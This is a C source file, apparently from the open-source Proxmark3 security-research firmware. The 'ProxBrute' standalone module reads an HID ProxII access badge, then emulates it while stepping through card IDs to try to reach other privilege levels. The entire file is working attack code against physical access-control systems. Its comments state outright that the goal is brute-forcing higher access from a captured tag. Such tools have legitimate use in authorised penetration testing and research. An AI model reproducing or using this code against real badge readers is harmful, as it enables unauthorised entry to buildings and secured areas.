proxmark3/armsrc/Standalone/lf_proxbrute.c
2019-09-15 02:00:42 +02:00

119 lines
3.6 KiB
C

//-----------------------------------------------------------------------------
// Samy Kamkar, 2011, 2012
// Brad antoniewicz 2011
// Christian Herrmann, 2017
//
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
// at your option, any later version. See the LICENSE.txt file for the text of
// the license.
//-----------------------------------------------------------------------------
// main code for LF aka Proxbrute by Brad antoniewicz
//-----------------------------------------------------------------------------
#include "standalone.h" // standalone definitions
#include "proxmark3_arm.h"
#include "appmain.h"
#include "fpgaloader.h"
#include "util.h"
#include "dbprint.h"
#include "ticks.h"
#include "lfops.h"
void ModInfo(void) {
DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)");
}
// samy's sniff and repeat routine for LF
void RunMod() {
StandAloneMode();
Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<");
FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
uint32_t high, low;
#define STATE_READ 0
#define STATE_BRUTE 1
uint8_t state = STATE_READ;
for (;;) {
WDT_HIT();
// exit from SamyRun, send a usbcommand.
if (data_available()) break;
// Was our button held down or pressed?
int button_pressed = BUTTON_HELD(280);
if (button_pressed != BUTTON_HOLD)
continue;
// Button was held for a second, begin recording
if (state == STATE_READ) {
LEDsoff();
LED_A_ON();
WAIT_BUTTON_RELEASED();
DbpString("[=] starting recording");
// findone, high, low, no ledcontrol (A)
CmdHIDdemodFSK(1, &high, &low, 0);
Dbprintf("[=] recorded | %x%08x", high, low);
// got nothing. blink and loop.
if (high == 0 && low == 0) {
SpinErr(LED_A, 100, 12);
DbpString("[=] only got zeros, retry recording after click");
continue;
}
SpinErr(LED_A, 250, 2);
state = STATE_BRUTE;
continue;
} else if (state == STATE_BRUTE) {
LED_C_ON(); // Simulate
WAIT_BUTTON_RELEASED();
/*
ProxBrute - brad a. - foundstone
Following code is a trivial brute forcer once you read a valid tag
the idea is you get a valid tag, then just try and brute force to
another priv level. The problem is that it has no idea if the code
worked or not, so its a crap shoot. One option is to time how long
it takes to get a valid ID then start from scratch every time.
*/
DbpString("[=] entering ProxBrute mode");
Dbprintf("[=] simulating | %08x%08x", high, low);
for (uint16_t i = low - 1; i > 0; i--) {
if (data_available()) break;
// Was our button held down or pressed?
int button_pressed = BUTTON_HELD(280);
if (button_pressed != BUTTON_HOLD) break;
Dbprintf("[=] trying Facility = %08x ID %08x", high, i);
// high, i, ledcontrol, timelimit 20000
CmdHIDsimTAGEx(0, high, i, 0, false, 20000);
SpinDelay(100);
}
state = STATE_READ;
SpinErr((LED_A | LED_C), 250, 2);
LEDsoff();
}
}
SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5);
DbpString("[=] You can take the shell back :) ...");
LEDsoff();
}